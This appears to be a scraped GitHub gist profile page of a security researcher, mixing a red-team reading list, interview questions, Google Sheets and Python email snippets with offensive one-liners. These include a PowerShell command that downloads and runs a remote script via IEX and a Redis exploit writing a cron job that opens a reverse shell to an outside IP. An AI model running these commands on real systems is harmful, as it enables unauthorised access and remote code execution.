Skip to content

Instantly share code, notes, and snippets.

View carnal0wnage's full-sized avatar

Chris Gates carnal0wnage

View GitHub Profile
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
1. What is information security and how is it achieved?
2. What are the core principles of information security?
3. What is non-repudiation (as it applies to IT security)?
4. What is the relationship between information security and data availability?
5. What is a security policy and why do we need one?
6. What is the difference between logical and physical security? Can you give an example of both?
7. What’s an acceptable level of risk?
8. What are the most common types of attacks that threaten enterprise data security?
9. What is the difference between a threat and a vulnerability?
10. Can you give me an example of common security vulnerabilities?
@carnal0wnage
carnal0wnage / gist:08da32e8c2ace3cedf9a
Created January 21, 2015 20:28
PowerShell exec with Import Module to run in Meterpreter shell (remote file via IEX)
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
@carnal0wnage
carnal0wnage / gcp_enum.sh
Last active January 24, 2024 18:06
use the gcloud utilities to enumerate as much access as possible from a GCP service account json file. see blog post: <to insert>
# gcloud auth activate-service-account --key-file=85.json
# gcloud projects list
project="my-project"
space=""
echo "gcloud auth list"
gcloud auth list
echo -e "$space"
redis-cli flushall
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
from https://phpinfo.me/2016/07/07/1275.html
@carnal0wnage
carnal0wnage / gist:cd5d5c714fd69691d80650887c3d5d75
Last active September 12, 2023 12:31
Google Sheet Code to grab current price from coin market cap
//from: https://github.com/rathergood/Crypto-Currency-Price/blob/master/ccprice
//returns price (or other info) of cryptocurrency from coinmarketcap api.
//takes two parameters, the name of the cryptocurrency and info that you want returned about the cc
//example: =ccprice("ethereum", "USD")
//example2 =ccprice("ethereum", "24h_volume_usd")
function ccprice(name, currency)
{
@carnal0wnage
carnal0wnage / python_email.py
Created June 21, 2016 16:47 — forked from srv89/python_email.py
Python code for sending HTML email (Attachment + Multiple Recipients )
__author__ = 'srv'
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
username = '' # Email Address from the email you want to send an email
password = '' # Password
server = smtplib.SMTP('')
@carnal0wnage
carnal0wnage / DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
Last active September 26, 2022 06:00
Links from Chris Gates/Ken Johnson DevOOPS RSA 17 presentation